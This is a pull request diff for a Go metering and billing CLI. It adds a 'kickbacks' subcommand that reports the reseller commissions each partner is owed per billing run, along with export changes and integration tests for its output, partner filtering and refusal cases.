### PR TITLE
Report kickbacks per partner and billing period

### DIFF
--- a/cmd/tally-engine/commands.go
+++ b/cmd/tally-engine/commands.go
@@ -7,6 +7,7 @@ import (
 	"io"
 	"io/fs"
 	"os"
+	"slices"
 	"strconv"
 	"time"
 
@@ -479,10 +480,11 @@ func newExportCmd() *cobra.Command {
 		Long: "Export the project statements of a run.\n\n" +
 			"json writes run.json and one statement document per project, or one credit note per project " +
 			"for a correction run. csv writes the rated records into rated.csv, and the deltas of a " +
-			"correction into deltas.csv. --out has to be empty or absent, so what it holds afterwards is " +
-			"one run's artifacts and nothing an earlier export of another run left there. Exporting a " +
-			"finalized run twice into a clean directory yields the same files, because a finalized run's " +
-			"records no longer change.",
+			"correction into deltas.csv. Both formats write the run's partner settlement beside them, " +
+			"kickbacks.json or kickbacks.csv, empty when the run owes nobody. --out has to be empty or " +
+			"absent, so what it holds afterwards is one run's artifacts and nothing an earlier export of " +
+			"another run left there. Exporting a finalized run twice into a clean directory yields the " +
+			"same files, because a finalized run's records no longer change.",
 		Args: cobra.NoArgs,
 		RunE: func(cmd *cobra.Command, _ []string) error {
 			id, err := validateRunID(runID)
@@ -560,6 +562,140 @@ func newExportCmd() *cobra.Command {
 	_ = cmd.MarkFlagRequired("run")
 	_ = cmd.MarkFlagRequired("format")
 	_ = cmd.MarkFlagRequired("out")
+	return cmd
+}
+
+// newKickbacksCmd builds the kickbacks subcommand.
+func newKickbacksCmd() *cobra.Command {
+	var month, runID, format, beneficiary string
+
+	cmd := &cobra.Command{
+		Use:   "kickbacks",
+		Short: "Report the kickbacks a run owes its partners",
+		Long: "Report the kickbacks a run owes its partners.\n\n" +
+			"The document lists, per partner and currency, the kickback total, the number of projects it came " +
+			"from and one entry per kickback record. json prints the settlement document, csv one row per " +
+			"record. A month alone reports the regular run that bills it; a correction named with --run " +
+			"reports the differences to the run it corrects, negative where usage was corrected down. Only a " +
+			"completed or finalized run is reported. A partner named with --beneficiary is reported alone, " +
+			"which is what that partner receives, and a partner the run settles nothing for is refused; " +
+			"without it the document holds every partner the run owes.",
+		Args: cobra.NoArgs,
+		RunE: func(cmd *cobra.Command, _ []string) error {
+			// The flags are checked before a configuration is read, so an
+			// operator who mistyped one hears about that flag rather than about
+			// the environment of the machine the command ran on.
+			from, _, err := validatePeriod(month)
+			if err != nil {
+				return err
+			}
+			var id uuid.UUID
+			if runID != "" {
+				if id, err = validateRunID(runID); err != nil {
+					return err
+				}
+			}
+			if err := validateFormat(format); err != nil {
+				return err
+			}
+
+			// Everything a report renders was written to the engine database by
+			// the run, so this reads that one database.
+			db, err := openStore(cmd.Context())
+			if err != nil {
+				return err
+			}
+			defer db.Close()
+
+			// A month named without a run is the regular run that bills it: what
+			// a partner is settled for a month is what that run settled, and the
+			// differences a correction booked on top are reached with --run.
+			if runID == "" {
+				if id, err = export.PeriodRun(cmd.Context(), db.Pool(), from); err != nil {
+					return err
+				}
+			}
+
+			// The settlement alone: this report renders none of the statements
+			// and none of the rated records a full export does, and a month of
+			// them is tens of thousands of rows to read and decode.
+			run, err := export.LoadKickbacks(cmd.Context(), db.Pool(), id)
+			if err != nil {
+				return err
+			}
+			// A run of another month settles what that month owed, so it is
+			// refused rather than reported under the month the operator named:
+			// this document is what a partner is paid from.
+			if !run.PeriodFrom.Equal(from) {
+				return fmt.Errorf("%w: run %s bills %s, not %s",
+					runs.ErrPeriodMismatch, id, period.Format(run.PeriodFrom), month)
+			}
+
+			// The status is read again outside the snapshot Load read under, the
+			// way the export reads it: a completed run is superseded by a second
+			// run of its period, and a superseded run bills nobody, so a
+			// settlement rendered from one names a payout no partner is owed.
+			current, err := sqlcgen.New(db.Pool()).GetRun(cmd.Context(), pgtype.UUID{Bytes: id, Valid: true})
+			if err != nil {
+				return fmt.Errorf("re-reading the run %s: %w", id, err)
+			}
+			if current.Status != run.Status {
+				return fmt.Errorf("run %s became %s while it was read, and was not reported", id, current.Status)
+			}
+
+			// A partner named with --beneficiary is settled from their own
+			// kickbacks alone. The document holds every partner the run owes,
+			// which is what finance reconciles a month with, and a copy of that
+			// document handed to one partner names what the others are paid and,
+			// through the base of every breakdown entry, what each customer
+			// project was billed.
+			//
+			// A name the run settles nothing under is refused rather than
+			// reported: the filter compares adjustment_records.beneficiary
+			// exactly, so a mistyped name leaves a well-formed document naming
+			// the run, the kind and the month with an empty list of partners
+			// under it, and nothing in that document, and no exit status beside
+			// it, tells a partner mailer or an ERP importer a typo apart from a
+			// month the partner is genuinely owed nothing for.
+			if beneficiary != "" {
+				if !slices.ContainsFunc(run.Kickbacks, func(k export.Kickback) bool {
+					return k.Beneficiary == beneficiary
+				}) {
+					return fmt.Errorf("run %s settles no kickbacks for %s, so there is no settlement to report",
+						id, beneficiary)
+				}
+				run.Kickbacks = slices.DeleteFunc(run.Kickbacks, func(k export.Kickback) bool {
+					return k.Beneficiary != beneficiary
+				})
+			}
+
+			var body []byte
+			switch format {
+			case formatJSON:
+				body, err = export.KickbacksJSON(run)
+			case formatCSV:
+				body, err = export.KickbacksCSV(run)
+			}
+			if err != nil {
+				return err
+			}
+
+			// One write, and nothing else goes to stdout: the report pipes into
+			// a file or a partner mailer as it is. Every refusal reaches stderr
+			// through cobra.
+			if _, err := cmd.OutOrStdout().Write(body); err != nil {
+				return fmt.Errorf("writing the output: %w", err)
+			}
+			return nil
+		},
+	}
+
+	cmd.Flags().StringVar(&month, "period", "", "billing month to report, YYYY-MM")
+	cmd.Flags().StringVar(&runID, "run", "", "id of the run to report; the month's regular run when absent")
+	cmd.Flags().StringVar(&format, "format", formatJSON, "output format: json or csv")
+	cmd.Flags().StringVar(&beneficiary, "beneficiary", "",
+		"report only this partner's kickbacks; every partner the run owes when absent")
+	_ = cmd.MarkFlagRequired("period")
 	return cmd
 }
 
@@ -642,9 +778,17 @@ func runLines(month string, result runs.Result) []string {
 // the month that run bills, and one line per file the format left in the
 // directory. The counts say how much of the month is in those files, so a run
 // that billed nobody says so here rather than in a listing of the directory.
+// The partner settlement, kickbacks.json or kickbacks.csv, is written by both
+// formats, so its line stands under either of them.
 func exportLines(month, format, out string, run export.Run) []string {
 	lines := []string{fmt.Sprintf("run %s exported for %s as %s into %s", run.ID, month, format, out)}
 	correction := run.Kind == runs.KindCorrection
+	// What a regular run settles for a partner is a kickback, and what a
+	// correction settles is the difference to the run it corrects.
+	kickbacks := "kickbacks"
+	if correction {
+		kickbacks = "kickback deltas"
+	}
 
 	switch format {
 	case formatJSON:
@@ -655,12 +799,15 @@ func exportLines(month, format, out string, run export.Run) []string {
 		if correction {
 			documents = "credit notes"
 		}
-		lines = append(lines, fmt.Sprintf("wrote run.json and %d %s", len(run.Statements), documents))
+		lines = append(lines,
+			fmt.Sprintf("wrote run.json and %d %s", len(run.Statements), documents),
+			fmt.Sprintf("wrote kickbacks.json with %d %s", len(run.Kickbacks), kickbacks))
 	case formatCSV:
 		lines = append(lines, fmt.Sprintf("wrote rated.csv with %d rated records", len(run.Rated)))
 		if correction {
 			lines = append(lines, fmt.Sprintf("wrote deltas.csv with %d deltas", len(run.Deltas)))
 		}
+		lines = append(lines, fmt.Sprintf("wrote kickbacks.csv with %d %s", len(run.Kickbacks), kickbacks))
 	}
 	return lines
 }

--- a/cmd/tally-engine/main.go
+++ b/cmd/tally-engine/main.go
@@ -1,8 +1,9 @@
 // Command tally-engine is the metering engine's operator tool and its
 // scheduler entrypoint. An operator drives a billing period through it: run
 // meters and rates a period, finalize closes it, detect-late and correct deal
-// with what arrived afterwards, and export writes the result out. The tick
-// subcommand is the same tree run unattended by an hourly CronJob.
+// with what arrived afterwards, export writes the result out, and kickbacks
+// reports what a run owes its partners. The tick subcommand is the same tree
+// run unattended by an hourly CronJob.
 //
 // It is also the only thing that runs DDL on the engine database. Its migrate
 // subcommand applies the embedded goose chain, migrate-status reports which of
@@ -85,6 +86,7 @@ func newRootCmd() *cobra.Command {
 		newCorrectCmd(),
 		pricing,
 		newExportCmd(),
+		newKickbacksCmd(),
 		newTickCmd(),
 	)
 	return root

--- a/cmd/tally-engine/main_test.go
+++ b/cmd/tally-engine/main_test.go
@@ -19,6 +19,7 @@ import (
 	"github.com/b42labs/tally/internal/engine/config"
 	"github.com/b42labs/tally/internal/engine/corrections"
 	"github.com/b42labs/tally/internal/engine/counters"
+	"github.com/b42labs/tally/internal/engine/export"
 	"github.com/b42labs/tally/internal/engine/period"
 	"github.com/b42labs/tally/internal/engine/pricing"
 	"github.com/b42labs/tally/internal/engine/runs"
@@ -58,6 +59,7 @@ func TestHelpNeedsNoEnvironment(t *testing.T) {
 		{"pricing import", []string{"pricing", "import"}},
 		{"pricing list", []string{"pricing", "list"}},
 		{"export", []string{"export"}},
+		{"kickbacks", []string{"kickbacks"}},
 		{"tick", []string{"tick"}},
 	} {
 		t.Run(tc.name, func(t *testing.T) {
@@ -873,10 +875,19 @@ func TestExportCLI(t *testing.T) {
 	if err != nil {
 		t.Fatalf("export as json error = %v, want nil (stderr %q)", err, stderr)
 	}
-	want := fmt.Sprintf("run %s exported for %s as json into %s\nwrote run.json and 1 statements\n",
+	want := fmt.Sprintf("run %s exported for %s as json into %s\n"+
+		"wrote run.json and 1 statements\nwrote kickbacks.json with 0 kickbacks\n",
 		id, month, documents)
 	if stdout != want {
 		t.Errorf("stdout of export as json = %q, want %q", stdout, want)
+	}
+
+	// The month is billed over a project no partner resells, so the settlement
+	// is written and holds nobody. The file stands for every run all the same: a
+	// missing one reads as a report that was not produced rather than as a run
+	// that owes nothing.
+	if _, err := os.Stat(filepath.Join(documents, "kickbacks.json")); err != nil {
+		t.Errorf("os.Stat(kickbacks.json) error = %v, want the written settlement", err)
 	}
 
 	// The index names the file the statement was written to and the total that
@@ -917,10 +928,14 @@ func TestExportCLI(t *testing.T) {
 	if err != nil {
 		t.Fatalf("export as csv error = %v, want nil (stderr %q)", err, stderr)
 	}
-	want = fmt.Sprintf("run %s exported for %s as csv into %s\nwrote rated.csv with 1 rated records\n",
+	want = fmt.Sprintf("run %s exported for %s as csv into %s\n"+
+		"wrote rated.csv with 1 rated records\nwrote kickbacks.csv with 0 kickbacks\n",
 		id, month, tables)
 	if stdout != want {
 		t.Errorf("stdout of export as csv = %q, want %q", stdout, want)
+	}
+	if _, err := os.Stat(filepath.Join(tables, "kickbacks.csv")); err != nil {
+		t.Errorf("os.Stat(kickbacks.csv) error = %v, want the written settlement", err)
 	}
 
 	header, rows := readCSVFile(t, filepath.Join(tables, "rated.csv"))
@@ -967,10 +982,14 @@ func TestExportCLI(t *testing.T) {
 	if err != nil {
 		t.Fatalf("exporting the correction as json error = %v, want nil (stderr %q)", err, stderr)
 	}
-	want = fmt.Sprintf("run %s exported for %s as json into %s\nwrote run.json and 1 credit notes\n",
+	want = fmt.Sprintf("run %s exported for %s as json into %s\n"+
+		"wrote run.json and 1 credit notes\nwrote kickbacks.json with 0 kickback deltas\n",
 		correction, month, notes)
 	if stdout != want {
 		t.Errorf("stdout of the correction's json export = %q, want %q", stdout, want)
+	}
+	if _, err := os.Stat(filepath.Join(notes, "kickbacks.json")); err != nil {
+		t.Errorf("os.Stat(kickbacks.json) error = %v, want the written settlement", err)
 	}
 
 	// A credit note lands under the key its project's statement did, under the
@@ -989,10 +1008,14 @@ func TestExportCLI(t *testing.T) {
 		t.Fatalf("exporting the correction as csv error = %v, want nil (stderr %q)", err, stderr)
 	}
 	want = fmt.Sprintf("run %s exported for %s as csv into %s\n"+
-		"wrote rated.csv with 2 rated records\nwrote deltas.csv with 1 deltas\n",
+		"wrote rated.csv with 2 rated records\nwrote deltas.csv with 1 deltas\n"+
+		"wrote kickbacks.csv with 0 kickback deltas\n",
 		correction, month, correctionTables)
 	if stdout != want {
 		t.Errorf("stdout of the correction's csv export = %q, want %q", stdout, want)
+	}
+	if _, err := os.Stat(filepath.Join(correctionTables, "kickbacks.csv")); err != nil {
+		t.Errorf("os.Stat(kickbacks.csv) error = %v, want the written settlement", err)
 	}
 
 	_, deltas := readCSVFile(t, filepath.Join(correctionTables, "deltas.csv"))
@@ -1015,13 +1038,17 @@ func TestExportCLI(t *testing.T) {
 		if err != nil {
 			t.Fatalf("export error = %v, want nil (stderr %q)", err, stderr)
 		}
-		want := fmt.Sprintf("run %s exported for %s as json into %s\nwrote run.json and 1 statements\n",
+		want := fmt.Sprintf("run %s exported for %s as json into %s\n"+
+			"wrote run.json and 1 statements\nwrote kickbacks.json with 0 kickbacks\n",
 			id, month, out)
 		if stdout != want {
 			t.Errorf("stdout = %q, want %q", stdout, want)
 		}
 		if _, err := os.Stat(filepath.Join(out, "run.json")); err != nil {
 			t.Errorf("os.Stat(run.json) error = %v, want the written index", err)
+		}
+		if _, err := os.Stat(filepath.Join(out, "kickbacks.json")); err != nil {
+			t.Errorf("os.Stat(kickbacks.json) error = %v, want the written settlement", err)
 		}
 	})
 
@@ -1077,6 +1104,396 @@ func TestExportCLI(t *testing.T) {
 	})
 }
 
+// TestKickbacksCLI reports what a run owes its partners: the month's regular
+// run, the same run named with --run, and the correction that booked a resize
+// afterwards. The correction settles negative numbers because the resize halved
+// the instance's vcpus for the second half of its life, so the finalized run
+// billed the month too high and the partner's share of that difference is taken
+// back rather than paid again.
+func TestKickbacksCLI(t *testing.T) {
+	f := newPipelineFixture(t)
+	// The fixture blanks the environment, so the relation types the adjustments
+	// are resolved through are set after it rather than before it.
+	t.Setenv("TALLY_ENGINE_ADJUSTMENT_RELATION_TYPES", "managed_by,member_of")
+
+	from, to := billingMonth(-9)
+	month := period.Format(from)
+	const (
+		cloud       = "os-cli-kickbacks"
+		project     = "proj-cli-kickbacks"
+		resourceID  = "i-cli-kickbacks"
+		beneficiary = "partner-corp-kickbacks"
+	)
+	f.seedProject(t, cloud, project)
+	f.seedInstance(t, cloud, resourceID, project, from)
+	// Valid from a month before the one that is billed, so the relation covers
+	// the whole of it.
+	f.seedRelation(t, f.projectIDOf(t, cloud, project), f.seedVirtualProject(t, "partner", beneficiary),
+		"managed_by", resellerAdjustments, from.AddDate(0, -1, 0))
+
+	if _, stderr, err := runCLI(t, "run", "--period", month, "--clouds", cloud); err != nil {
+		t.Fatalf("run error = %v, want nil (stderr %q)", err, stderr)
+	}
+	id := f.completedRun(t, from)
+
+	document, stderr, err := runCLI(t, "kickbacks", "--period", month)
+	if err != nil {
+		t.Fatalf("kickbacks error = %v, want nil (stderr %q)", err, stderr)
+	}
+	if stderr != "" {
+		t.Errorf("stderr = %q, want the document on stdout and nothing beside it", stderr)
+	}
+
+	report := decodeKickbacks(t, "kickbacks --period", document)
+	if report.RunID != id.String() {
+		t.Errorf("the document reports run %q, want the regular run %s", report.RunID, id)
+	}
+	if report.Kind != runs.KindRegular {
+		t.Errorf("the document reports the kind %q, want %q", report.Kind, runs.KindRegular)
+	}
+	if report.CorrectsRunID != nil {
+		t.Errorf("the document corrects run %q, want none for a regular run", *report.CorrectsRunID)
+	}
+	if want := from.Format(time.RFC3339); report.PeriodFrom != want {
+		t.Errorf("the document reports period_from %q, want %q", report.PeriodFrom, want)
+	}
+	if want := to.Format(time.RFC3339); report.PeriodTo != want {
+		t.Errorf("the document reports period_to %q, want %q", report.PeriodTo, want)
+	}
+	if len(report.Beneficiaries) != 1 {
+		t.Fatalf("the document settles %d beneficiaries, want 1", len(report.Beneficiaries))
+	}
+
+	// The instance lived 48 hours at 4 vcpus at 0.02 per unit-hour, which is
+	// 3.84. The 15 percent discount takes 0.58 off it, and the partner is owed
+	// 10 percent of the 3.26 that is left.
+	settled := report.Beneficiaries[0]
+	if settled.Beneficiary != beneficiary {
+		t.Errorf("the document settles %q, want %q", settled.Beneficiary, beneficiary)
+	}
+	if want := "EUR"; settled.Currency != want {
+		t.Errorf("the document settles in %q, want %q", settled.Currency, want)
+	}
+	if want := "0.33"; settled.KickbackTotal.String() != want {
+		t.Errorf("the kickback total = %s, want %s", settled.KickbackTotal, want)
+	}
+	if settled.Projects != 1 {
+		t.Errorf("the total came off %d projects, want 1", settled.Projects)
+	}
+	if len(settled.Breakdown) != 1 {
+		t.Fatalf("the breakdown holds %d entries, want 1", len(settled.Breakdown))
+	}
+
+	kickback := settled.Breakdown[0]
+	// The relation is what the auditability drill walks back to the registry, so
+	// what stands there has to be a run's relation id rather than a name.
+	if _, err := uuid.Parse(kickback.RelationID); err != nil {
+		t.Errorf("uuid.Parse(%q) error = %v, want the relation the kickback came from",
+			kickback.RelationID, err)
+	}
+	for _, tc := range []struct{ field, got, want string }{
+		{"cloud", kickback.Cloud, cloud},
+		{"project_id", kickback.ProjectID, project},
+		{"scope", kickback.Scope, "all"},
+		{"rate", kickback.Rate.String(), "0.100000"},
+		{"base", kickback.Base.String(), "3.26"},
+		{"amount", kickback.Amount.String(), "0.33"},
+	} {
+		if tc.got != tc.want {
+			t.Errorf("the kickback %s = %q, want %q", tc.field, tc.got, tc.want)
+		}
+	}
+
+	stdout, stderr, err := runCLI(t, "kickbacks", "--period", month, "--format", "csv")
+	if err != nil {
+		t.Fatalf("kickbacks as csv error = %v, want nil (stderr %q)", err, stderr)
+	}
+	header, rows := parseCSV(t, "the kickbacks table", []byte(stdout))
+	if len(header) != 14 {
+		t.Fatalf("the table holds %d columns, want 14", len(header))
+	}
+	if len(rows) != 1 {
+		t.Fatalf("the table holds %d rows under its header, want 1", len(rows))
+	}
+	for _, tc := range []struct{ column, want string }{
+		{"run_id", id.String()},
+		{"kind", runs.KindRegular},
+		{"corrects_run_id", ""},
+		{"beneficiary", beneficiary},
+		{"cloud", cloud},
+		{"project_id", project},
+		{"scope", "all"},
+		{"rate", "0.100000"},
+		{"base", "3.26"},
+		{"amount", "0.33"},
+		{"currency", "EUR"},
+	} {
+		if got := rows[0][tc.column]; got != tc.want {
+			t.Errorf("the table %s = %q, want %q", tc.column, got, tc.want)
+		}
+	}
+
+	// The month alone and the run that bills it report the same settlement,
+	// which is what makes --run the way to a correction rather than a second way
+	// to a month.
+	named, stderr, err := runCLI(t, "kickbacks", "--period", month, "--run", id.String())
+	if err != nil {
+		t.Fatalf("kickbacks --run error = %v, want nil (stderr %q)", err, stderr)
+	}
+	if named != document {
+		t.Errorf("stdout of --run = %q, want the document of the month %q", named, document)
+	}
+
+	if _, stderr, err := runCLI(t, "finalize", "--period", month, "--run", id.String()); err != nil {
+		t.Fatalf("finalize error = %v, want nil (stderr %q)", err, stderr)
+	}
+
+	// A resize halfway through the instance's life, which halves its vcpus for
+	// the second half of it and reached the reporting database after the
+	// finalized run had billed the month.
+	f.seedEvent(t, cloud, resourceID, project, "ev-resize-"+resourceID, "compute.instance.resize.end",
+		from.Add(48*time.Hour), `{"state":"active","size":{"vcpus":2,"ram_gb":8,"disk_gb":80,"flavor":"m1.large"}}`)
+
+	if _, stderr, err := runCLI(t, "correct", "--period", month); err != nil {
+		t.Fatalf("correct error = %v, want nil (stderr %q)", err, stderr)
+	}
+	correction := f.completedCorrection(t, from)
+
+	stdout, stderr, err = runCLI(t, "kickbacks", "--period", month, "--run", correction.String())
+	if err != nil {
+		t.Fatalf("the correction's kickbacks error = %v, want nil (stderr %q)", err, stderr)
+	}
+	report = decodeKickbacks(t, "kickbacks of the correction", stdout)
+	if report.Kind != runs.KindCorrection {
+		t.Errorf("the document reports the kind %q, want %q", report.Kind, runs.KindCorrection)
+	}
+	if report.CorrectsRunID == nil {
+		t.Fatalf("the document corrects no run, want the finalized run %s", id)
+	}
+	if *report.CorrectsRunID != id.String() {
+		t.Errorf("the document corrects run %q, want the finalized run %s", *report.CorrectsRunID, id)
+	}
+	if len(report.Beneficiaries) != 1 {
+		t.Fatalf("the document settles %d beneficiaries, want 1", len(report.Beneficiaries))
+	}
+
+	// The correction rates 2.88, the discount takes 0.43 off it, and the partner
+	// is owed 0.25 of the 2.45 that is left. What the document carries is the
+	// difference to the 0.33 the finalized run settled.
+	settled = report.Beneficiaries[0]
+	if want := "-0.08"; settled.KickbackTotal.String() != want {
+		t.Errorf("the kickback total of the correction = %s, want %s", settled.KickbackTotal, want)
+	}
+	if settled.Projects != 1 {
+		t.Errorf("the total came off %d projects, want 1", settled.Projects)
+	}
+	if len(settled.Breakdown) != 1 {
+		t.Fatalf("the breakdown holds %d entries, want 1", len(settled.Breakdown))
+	}
+	kickback = settled.Breakdown[0]
+	if want := "-0.81"; kickback.Base.String() != want {
+		t.Errorf("the base of the difference = %s, want %s", kickback.Base, want)
+	}
+	if want := "-0.08"; kickback.Amount.String() != want {
+		t.Errorf("the amount of the difference = %s, want %s", kickback.Amount, want)
+	}
+
+	if _, stderr, err := runCLI(t, "finalize", "--period", month, "--run", correction.String()); err != nil {
+		t.Fatalf("finalizing the correction error = %v, want nil (stderr %q)", err, stderr)
+	}
+
+	// A finalized correction is never what the month alone reports: what a
+	// partner is settled for a month is what the regular run of it settled, and
+	// the differences on top of that are reached by naming the correction.
+	stdout, stderr, err = runCLI(t, "kickbacks", "--period", month)
+	if err != nil {
+		t.Fatalf("kickbacks after the correction error = %v, want nil (stderr %q)", err, stderr)
+	}
+	report = decodeKickbacks(t, "kickbacks after the correction", stdout)
+	if report.Kind != runs.KindRegular || report.RunID != id.String() {
+		t.Errorf("the document reports the %s run %q, want the regular run %s", report.Kind, report.RunID, id)
+	}
+	if len(report.Beneficiaries) != 1 {
+		t.Fatalf("the document settles %d beneficiaries, want 1", len(report.Beneficiaries))
+	}
+	if want := "0.33"; report.Beneficiaries[0].KickbackTotal.String() != want {
+		t.Errorf("the kickback total = %s, want the %s the regular run settled",
+			report.Beneficiaries[0].KickbackTotal, want)
+	}
+
+	t.Run("reports one partner alone", func(t *testing.T) {
+		// What one partner receives holds their own kickbacks and nothing else:
+		// the document of a month names every partner the run owes and, through
+		// the base of every breakdown entry, what each customer project was
+		// billed after its discounts. The month metered above owes one partner,
+		// so a copy of that document filtered to that partner is the document
+		// again and pins nothing; this month owes two.
+		shared, _ := billingMonth(-8)
+		sharedMonth := period.Format(shared)
+		const (
+			sharedResourceID = "i-cli-kickbacks-shared"
+			otherProject     = "proj-cli-kickbacks-other"
+			otherResourceID  = "i-cli-kickbacks-other"
+			otherBeneficiary = "partner-other-kickbacks"
+		)
+		f.seedInstance(t, cloud, sharedResourceID, project, shared)
+		f.seedProject(t, cloud, otherProject)
+		f.seedInstance(t, cloud, otherResourceID, otherProject, shared)
+		f.seedRelation(t, f.projectIDOf(t, cloud, otherProject),
+			f.seedVirtualProject(t, "partner", otherBeneficiary),
+			"managed_by", resellerAdjustments, shared.AddDate(0, -1, 0))
+
+		if _, stderr, err := runCLI(t, "run", "--period", sharedMonth, "--clouds", cloud); err != nil {
+			t.Fatalf("the run of the month owing two partners error = %v, want nil (stderr %q)", err, stderr)
+		}
+
+		whole, stderr, err := runCLI(t, "kickbacks", "--period", sharedMonth)
+		if err != nil {
+			t.Fatalf("kickbacks error = %v, want nil (stderr %q)", err, stderr)
+		}
+		settles := decodeKickbacks(t, "kickbacks of the month owing two partners", whole).Beneficiaries
+		if len(settles) != 2 {
+			t.Fatalf("the document settles %d partners, want the two the month owes", len(settles))
+		}
+
+		named, stderr, err := runCLI(t, "kickbacks", "--period", sharedMonth, "--beneficiary", beneficiary)
+		if err != nil {
+			t.Fatalf("kickbacks --beneficiary error = %v, want nil (stderr %q)", err, stderr)
+		}
+		one := decodeKickbacks(t, "kickbacks --beneficiary", named).Beneficiaries
+		if len(one) != 1 || one[0].Beneficiary != beneficiary {
+			t.Fatalf("the copy settles %v, want %s alone", one, beneficiary)
+		}
+		// Neither the other partner nor the project they resell is named: the
+		// base of a breakdown entry is what that project was billed.
+		for _, want := range []string{otherBeneficiary, otherProject} {
+			if strings.Contains(named, want) {
+				t.Errorf("the copy of %s names %q, want nothing of another partner in it", beneficiary, want)
+			}
+		}
+	})
+
+	t.Run("refuses a partner the run settles nothing for", func(t *testing.T) {
+		// The filter compares the partner's name exactly, so a mistyped one
+		// matches nothing. Reported, it is a well-formed settlement document
+		// naming the run and the month with no partner under it, which a
+		// mailer or an importer reads as a month the partner is owed nothing
+		// for, so it is refused instead.
+		stdout, _, err := runCLI(t, "kickbacks", "--period", month, "--beneficiary", "partner-other")
+		if err == nil {
+			t.Fatal("kickbacks error = nil, want the partner the run settles nothing for refused")
+		}
+		for _, want := range []string{id.String(), "partner-other"} {
+			if !strings.Contains(err.Error(), want) {
+				t.Errorf("kickbacks error = %q, want it to name %q", err, want)
+			}
+		}
+		if stdout != "" {
+			t.Errorf("stdout = %q, want nothing printed by a report that was refused", stdout)
+		}
+	})
+
+	t.Run("refuses a run of another month", func(t *testing.T) {
+		other, _ := billingMonth(-10)
+		otherMonth := period.Format(other)
+		// Nothing lived in that month, so the run bills nobody. What it is here
+		// for is being a run of a month the report was not asked about.
+		if _, stderr, err := runCLI(t, "run", "--period", otherMonth, "--clouds", cloud); err != nil {
+			t.Fatalf("run error = %v, want nil (stderr %q)", err, stderr)
+		}
+
+		stdout, _, err := runCLI(t, "kickbacks", "--period", month, "--run", f.completedRun(t, other).String())
+		if err == nil {
+			t.Fatal("kickbacks error = nil, want the run of another month refused")
+		}
+		if !errors.Is(err, runs.ErrPeriodMismatch) {
+			t.Errorf("kickbacks error = %v, want one matching ErrPeriodMismatch", err)
+		}
+		for _, want := range []string{month, otherMonth} {
+			if !strings.Contains(err.Error(), want) {
+				t.Errorf("kickbacks error = %q, want it to name %q", err, want)
+			}
+		}
+		if stdout != "" {
+			t.Errorf("stdout = %q, want nothing printed by a report that was refused", stdout)
+		}
+	})
+
+	// A month the engine never worked on, first without a row of its own and
+	// then with an open one. Both are answered with the run that produces the
+	// settlement, so the two cases run in this order.
+	bare, bareTo := billingMonth(-11)
+
+	t.Run("refuses a month without a billing period", func(t *testing.T) {
+		_, _, err := runCLI(t, "kickbacks", "--period", period.Format(bare))
+		if err == nil {
+			t.Fatal("kickbacks error = nil, want the month without a run refused")
+		}
+		if !errors.Is(err, export.ErrNoRunForPeriod) {
+			t.Errorf("kickbacks error = %v, want one matching ErrNoRunForPeriod", err)
+		}
+		if want := "has no billing period"; !strings.Contains(err.Error(), want) {
+			t.Errorf("kickbacks error = %q, want it to contain %q", err, want)
+		}
+	})
+
+	t.Run("refuses a month with a period row and no completed run", func(t *testing.T) {
+		f.seedPeriod(t, bare, bareTo, "open")
+
+		_, _, err := runCLI(t, "kickbacks", "--period", period.Format(bare))
+		if err == nil {
+			t.Fatal("kickbacks error = nil, want the month without a run refused")
+		}
+		if !errors.Is(err, export.ErrNoRunForPeriod) {
+			t.Errorf("kickbacks error = %v, want one matching ErrNoRunForPeriod", err)
+		}
+		for _, want := range []string{"has no completed run", "tally-engine run --period"} {
+			if !strings.Contains(err.Error(), want) {
+				t.Errorf("kickbacks error = %q, want it to contain %q", err, want)
+			}
+		}
+	})
+
+	t.Run("refuses a superseded run", func(t *testing.T) {
+		// A month metered twice leaves the first run behind in this status. Its
+		// records bill nothing, so no partner is settled out of them.
+		var superseded uuid.UUID
+		if err := f.engine.Store.Pool().QueryRow(t.Context(),
+			`INSERT INTO runs (period_from, period_to, status)
+			 VALUES ($1, $2, 'superseded') RETURNING id`,
+			from, to).Scan(&superseded); err != nil {
+			t.Fatalf("seeding the superseded run: %v", err)
+		}
+
+		stdout, _, err := runCLI(t, "kickbacks", "--period", month, "--run", superseded.String())
+		if err == nil {
+			t.Fatal("kickbacks error = nil, want the superseded run refused")
+		}
+		if want := "superseded"; !strings.Contains(err.Error(), want) {
+			t.Errorf("kickbacks error = %q, want it to contain %q", err, want)
+		}
+		if stdout != "" {
+			t.Errorf("stdout = %q, want nothing printed by a report that was refused", stdout)
+		}
+	})
+
+	// A report reads the engine database and nothing else: what it renders was
+	// written there by the run, so a partner is settled from a machine that
+	// reaches neither the reporting database nor the counter sources.
+	t.Run("works with the engine database alone", func(t *testing.T) {
+		useDatabase(t, f.engine.URL)
+		t.Setenv("TALLY_ENGINE_COUNTER_SOURCES", filepath.Join(t.TempDir(), "missing.yaml"))
+
+		stdout, stderr, err := runCLI(t, "kickbacks", "--period", month)
+		if err != nil {
+			t.Fatalf("kickbacks error = %v, want nil (stderr %q)", err, stderr)
+		}
+		if got := decodeKickbacks(t, "kickbacks over the engine database", stdout).RunID; got != id.String() {
+			t.Errorf("the document reports run %q, want the regular run %s", got, id)
+		}
+	})
+}
+
 // runIndex is the part of run.json the assertions above read: one entry per
 // document the export wrote. The file carries more, which the export package's
 // own tests pin. The total is a json.Number, so it is compared as the digits
@@ -1087,6 +1504,35 @@ type runIndex struct {
 		File  string      `json:"file"`
 		Total json.Number `json:"total"`
 	} `json:"statements"`
+}
+
+// kickbacksReport is the settlement document the kickbacks subcommand prints,
+// as much of it as the assertions above read. The export package's own tests
+// pin the rest. The amounts are json.Number, so they are compared as the digits
+// the document holds rather than through a float.
+type kickbacksReport struct {
+	RunID string `json:"run_id"`
+	Kind  string `json:"kind"`
+	// A pointer, so a regular run's null is told apart from the run a
+	// correction names.
+	CorrectsRunID *string `json:"corrects_run_id"`
+	PeriodFrom    string  `json:"period_from"`
+	PeriodTo      string  `json:"period_to"`
+	Beneficiaries []struct {
+		Beneficiary   string      `json:"beneficiary"`
+		Currency      string      `json:"currency"`
+		KickbackTotal json.Number `json:"kickback_total"`
+		Projects      int         `json:"projects"`
+		Breakdown     []struct {
+			Cloud      string      `json:"cloud"`
+			ProjectID  string      `json:"project_id"`
+			RelationID string      `json:"relation_id"`
+			Scope      string      `json:"scope"`
+			Rate       json.Number `json:"rate"`
+			Base       json.Number `json:"base"`
+			Amount     json.Number `json:"amount"`
+		} `json:"breakdown"`
+	} `json:"beneficiaries"`
 }
 
 // readJSONFile decodes one exported artifact into v. A file the export did not
@@ -1104,10 +1550,20 @@ func readJSONFile(t *testing.T, path string, v any) {
 	}
 }
 
